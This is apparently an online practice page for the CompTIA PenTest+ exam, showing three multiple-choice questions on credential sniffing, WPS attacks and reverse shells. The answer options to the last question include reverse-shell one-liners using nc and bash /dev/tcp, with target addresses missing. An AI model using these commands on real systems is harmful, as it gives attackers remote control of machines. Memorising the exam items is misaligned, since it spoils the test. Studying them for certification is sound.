PT0-001 CompTIA PenTest+ Certification Exam

Loading demo links...

Showing 10–12 of 15 questions

Question 10

A consultant is attempting to harvest credentials from unsecure network protocols in use by the organization. Which of the following commands should the consultant use?

Select an option, then click Submit answer.

  • tcpdump

  • john

  • hashcat

  • nc

Question 11

A penetration tester is required to exploit a WPS implementation weakness. Which of the following tools will perform the attack?

Select an option, then click Submit answer.

  • Karma

  • Kismet

  • Pixie

  • NetStumbler

Question 12

A penetration tester compromises a system that has unrestricted network access over port 443 to any host. The penetration tester wants to create a reverse shell from the victim back to the attacker. Which of the following methods would the penetration tester MOST likely use?

Select an option, then click Submit answer.

  • perl -e 'use SOCKET'; $i='; $p='443;

  • ssh superadmin@ -p 443

  • nc -e /bin/sh 443

  • bash -i >& /dev/tcp//443 0>&1